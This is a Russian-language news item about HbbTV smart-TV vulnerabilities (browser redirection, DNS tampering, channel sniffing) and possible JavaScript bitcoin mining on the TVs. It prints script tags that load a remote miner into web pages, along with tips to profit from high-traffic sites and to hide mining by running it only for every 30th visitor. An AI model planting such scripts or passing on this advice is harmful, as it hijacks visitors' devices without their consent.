Майнинг биткоинов на телевизорах

Рекомендуем почитать:

Xakep #299. Sysmon

В телевизорах Hybrid Broadcast Broadband TV (HbbTV) обнаружены уязвимости, которые позволяют получить несанкционированный доступ в удаленном режиме. Системный браузер можно направить по произвольному адресу и даже запустить майнинг биткоинов. Кроме того, с помощью сетевого снифера по MAC-адресам и размеру передаваемых пакетов в сети можно понять, какой телеканал смотрит пользователь (описание атаки: pdf, нем. яз.).

Телеприемники HbbTV установлены у 20 миллионов пользователей в Европе. Такие устройства загружают контент по интернету, так что постоянно находятся в онлайне. Как показало тестирование на моделях Samsung UE40ES6300, UE40D6200 и UE46ES7000, система HbbTV уязвима сразу для нескольких типов атак, в том числе внедрение управляющих команд и изменение настроек DNS, чтобы перенаправить запросы с цифровой приставки на серверы, контролируемые злоумышленником. Поскольку можно направить запросы к контролируемому источнику, то можно даже запустить на телевизоре JavaScript-майнер типа BitcoinPlus, утверждает один из авторов исследования, немецкий хакер Мартин Херфюрт (Martin Herfurt) из компании Nruns.

Как известно, реализация майнера биткоинов на JavaScript предусматривает внедрение кода на любую страницу, так что каждый посетитель этой страницы будет добывать монеты в фоновом режиме, пока у него открыта соответствующая страница в браузере.

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"></script>
<script src="http://www.bitcoinplus.com/js/miner.js" type="text/javascript"></script>
<script type="text/javascript">BitcoinPlusMiner("donny@bitcoinplus.com")</script>

Конечно, много такой скрипт не нагенерирует, но если вставить его на сайт с миллионной аудиторией, то можно и заработать парочку BTC.

Для маскировки, можно запускать майнер не у всех посетителей сайта, а, например, у каждого 30-го.

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"></script>
<script src="http://www.bitcoinplus.com/js/miner.js" type="text/javascript"></script>
<script type="text/javascript">BitcoinPlusMiner("donny@bitcoinplus.com", {toVisitor: 30})</script>

Майнинг биткоинов на телевизорах

Xakep #299. Sysmon

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Обзор перспективных исследований. Колонка Дениса Макрушина

HTB Hospital. Получаем доступ к хосту через уязвимость Ghostscript

EIGRP Scam. Отравляем таблицу маршрутизации на Python

Липовый соникс. Реверсим картридж Liposonix и пишем его эмулятор

Трюки

Липовый соникс. Реверсим картридж Liposonix и пишем его эмулятор

Новая диета для Linux. Загружаем современный Linux, используя минимум памяти

Фишинг в соцсетях. Как социальные сети помогают хакерам

Сделай мне красиво! Изобретаем персональный нейросетевой фотоувеличитель

Последние новости

Взломан провайдер МФА-сообщений Cisco

Полупроводниковая компания Nexperia стала жертвой вымогателей

Майнер обманул облачных провайдеров на 3,5 млн долларов, но «заработал» всего миллион

Группа TA558 использует стеганографию и атаковала 320 организаций по всему миру

Бывшего инженера Amazon приговорили к трем годам тюрьмы за взлом криптобирж